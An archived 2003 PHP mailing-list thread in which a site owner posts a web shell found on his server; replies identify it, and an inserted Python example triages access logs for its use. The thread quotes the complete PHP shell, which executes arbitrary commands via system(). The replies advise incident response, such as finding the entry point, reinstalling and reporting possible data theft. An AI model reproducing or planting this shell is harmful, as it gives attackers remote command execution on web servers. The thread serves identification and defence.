Re: [PHP] Possible My Website was hacked... with PHP... please tell me what this is???

2003-07-31 Thread John Coggeshall
Looks like it is a PHP script to give people shell access as the web
server user.


On Thu, 2003-07-31 at 02:06, Joe Harman wrote:
 I found this on my server... I have no idea what it is... can someone
 tell me what it does... 
 
  
 
 Thanks
 
  
 
 --
 
  
 
 html head
 
 titlePHP Shell - CP/title
 
 /head
 
 body bgcolor=#FF text=#33 link=#00 vlink=#00
 alink=#00
 
 h1 align=centerfont size=+4 face=verdanaCrime
 Perfect/fontbr
 
 font face=Tahoma size=+1PHP Shell - by _m4st3r_c0d3/font/h1
 
 ?php
 
 /* First we check if there has been asked for a working directory. */
 
 if (isset($work_dir)) {
 
 /* A workdir has been asked for - we chdir to that dir. */
 
 chdir($work_dir);
 
 $work_dir = exec(pwd);
 
 } else {
 
 /* No work_dir - we chdir to $DOCUMENT_ROOT */
 
 chdir($DOCUMENT_ROOT);
 
 $work_dir = $DOCUMENT_ROOT;
 
 }
 
 ?
 
 form name=myform action=?php echo $PHP_SELF ? method=post
 
 pbDiretoacute;rio em que vocecirc; estaacute; no momento:
 
 ?php
 
 $work_dir_splitted = explode(/, substr($work_dir, 1));
 
 echo a href=\$PHP_SELF?work_dir= . urlencode($url) . /command= .
 urlencode($command) . \Root/a/;
 
 if ($work_dir_splitted[0] == ) {
 
 $work_dir = /; /* Root directory. */
 
 } else {
 
 for ($i = 0; $i  count($work_dir_splitted); $i++) {
 
 /* echo i = $i;*/
 
 $url .= /.$work_dir_splitted[$i];
 
 echo a href=\$PHP_SELF?work_dir= . urlencode($url) . command= .
 urlencode($command) . \$work_dir_splitted[$i]/a/;
 
 }
 
 }
 
 ?
 
 /b/p
 
 pbEscolha abaixo o diretoacute;rio em que deseja ir:/b/p
 
 select name=work_dir onChange=this.form.submit()
 
 ?php
 
 /* Now we make a list of the directories. */
 
 $dir_handle = opendir($work_dir);
 
 /* Run through all the files and directories to find the dirs. */
 
 while ($dir = readdir($dir_handle)) {
 
 if (is_dir($dir)) {
 
 if ($dir == .) {
 
 echo option value=\$work_dir\ selectedCurrent
 Directory/option\n;
 
 } elseif ($dir == ..) {
 
 /* We have found the parent dir. We must be carefull if the parent
 
 directory is the root directory (/). */
 
 if (strlen($work_dir) == 1) {
 
 /* work_dir is only 1 charecter - it can only be / */
 
 } elseif (strrpos($work_dir, /) == 0) {
 
 /* The last / in work_dir were the first charecter.
 
 This means that we have a top-level directory
 
 eg. /bin or /home etc... */
 
 echo option value=\/\Parent Directory/option\n;
 
 } else {
 
 /* We do a little bit of string-manipulation to find the parent
 
 directory... Trust me - it works :-) */
 
 echo option value=\. strrev(substr(strstr(strrev($work_dir), /),
 1)) .\Parent Directory/option\n;
 
 }
 
 } else {
 
 if ($work_dir == /) {
 
 echo option value=\$work_dir$dir\$dir/option\n;
 
 } else {
 
 echo option value=\$work_dir/$dir\$dir/option\n;
 
 }
 
 }
 
 }
 
 }
 
 closedir($dir_handle);
 
 ?
 
 /select
 
 pbDigite abaixo os comandos que deseja executar:/b/p
 
 input type=text name=command size=60 ?php if ($command) { echo
 value=\$command\;} ?  input name=submit_btn type=submit
 value=Execute Command/p
 
 pLigar/Ativar codestderr/code-trapping?
 
 input type=checkbox name=stderr/p
 
 pbAbaixo, terminal onde apareceraacute; os resultados dos comandos
 que
 
 vocecirc; executou/b/p
 
 p
 
 textarea cols=80 rows=20 readonly
 
 ?php
 
 if ($command) {
 
 if ($stderr) {
 
 system($command .  1 /tmp/output.txt 21; cat /tmp/output.txt; rm
 /tmp/output.txt);
 
 } else {
 
 system($command);
 
 }
 
 }
 
 ?
 
 /textarea
 
 /p
 
 /form
 
  
 
 pbCrime Perfect 2003 /b/p
 
 pbBy _m4st3r_c0d3 - #crimeperfect/b/p
 
 /div
 
 /body
 
 /html
 
  
 
  
 Joe Harman
 
 http://www.HarmanMedia.com
 
 Only two things are infinite, the universe and human stupidity, and I'm
 not sure about the former. - Albert Einstein 
  
-- 
-~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~-
John Coggeshall http://www.coggeshall.org/
john at coggeshall dot org 

The PHP Developer's Handbook
The definitive PHP5 developer's guide http://www.php-handbook.com/
-~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~-


-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
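
The script quoted above carries its state in two request parameters, `work_dir` and `command`, and submits typed commands by POST. As an added example (not part of the thread), the following Python triages an Apache combined-format access log for paths requested with both parameters and then summarises every request to those paths; the log lines, client addresses and the `/images/cp.php` path are constructed for illustration.

```python
import re
from collections import Counter
from datetime import datetime
from urllib.parse import urlsplit, parse_qs

# Constructed sample in Apache combined log format (not taken from the thread).
SAMPLE_LOG = """\
198.51.100.7 - - [30/Jul/2003:22:14:03 +0000] "GET /images/cp.php HTTP/1.0" 200 2210 "-" "Mozilla/4.0"
198.51.100.7 - - [30/Jul/2003:22:14:40 +0000] "GET /images/cp.php?work_dir=%2Ftmp&command=id HTTP/1.0" 200 2301 "-" "Mozilla/4.0"
203.0.113.9 - - [30/Jul/2003:22:15:02 +0000] "GET /index.php?page=news HTTP/1.0" 200 5120 "-" "Mozilla/4.0"
198.51.100.7 - - [30/Jul/2003:22:16:11 +0000] "POST /images/cp.php HTTP/1.0" 200 2650 "-" "Mozilla/4.0"
203.0.113.9 - - [31/Jul/2003:01:02:00 +0000] "GET /search.php?command=help HTTP/1.0" 200 900 "-" "Mozilla/4.0"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*"')

def parse(log_text):
    """Yield (time, client, method, path, query-dict) for each parsable line."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ip, ts, method, target = m.groups()
            url = urlsplit(target)
            yield (datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"), ip, method,
                   url.path, parse_qs(url.query, keep_blank_values=True))

def shell_activity(log_text):
    records = list(parse(log_text))
    # Pass 1: paths requested with BOTH parameters the posted script uses.
    suspects = {r[3] for r in records if "work_dir" in r[4] and "command" in r[4]}
    # Pass 2: every request to those paths, including POSTs, whose body
    # (and so the command that was run) never reaches the access log.
    report = {}
    for path in suspects:
        reqs = sorted((r for r in records if r[3] == path), key=lambda r: r[0])
        methods = Counter(r[2] for r in reqs)
        report[path] = {
            "first_seen": reqs[0][0],
            "clients": sorted({r[1] for r in reqs}),
            "posts": methods["POST"],
            "get_commands": [r[4]["command"][0] for r in reqs if "command" in r[4]],
        }
    return report
```

`first_seen` gives the earliest logged request to the file, which bounds the window to search in upload, FTP and error logs for how it arrived; a non-zero `posts` count means commands were run that the access log cannot show.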



Re: [PHP] Possible My Website was hacked... with PHP... please tell me what this is???

2003-07-31 Thread John Manko
trolling!
ha
binc2 wrote:

Hi guys 

what does trolling mean? Never heard of it before.

Angelo

-Original Message-
From: Joel Rees [EMAIL PROTECTED]
To: Joe Harman [EMAIL PROTECTED], [EMAIL PROTECTED]
Date: Thu, 31 Jul 2003 16:10:24 +0900
Subject: Re: [PHP] Possible My Website was hacked... with PHP... please tell me what this is??? 

Assuming you are not just trolling,

 

Fortunately I don't think they were doing something correctly, cause it
didn't deface my site like some of the others 
   

Don't count on it. They only deface servers they don't want to use.

 

...
everyone can execute shell commands via system(); on your server.
- delete the script ;)
   

Oh, by all means, delete it if you want. But it's not the hole it came
in through, and it's not the real backdoor.
It's so blatant, I'd guess it's a script kiddy or a decoy. Even if it's
a script kiddy, you _want_ to know how it got on the box.
I'd take the box offline, back up all the data and configuration files,
and re-install the whole system and all programs from scratch. Go over
every configuration file with a fine-tooth comb. 

If the machine is on a subnet and I controlled the subnet, I think I'd
take the whole subnet down, including the firewall, and clean every
machine up, not putting any machine back on the subnet until it was
clean and any holes patched. If I didn't control the subnet, I'd make
sure the persons who did know there had been a break-in.
And if you have any valuable data, consider it to have been stolen. If
you have credit card numbers, report the possibility of theft to the
credit card companies. Etc.
If you're trolling, go away.

 


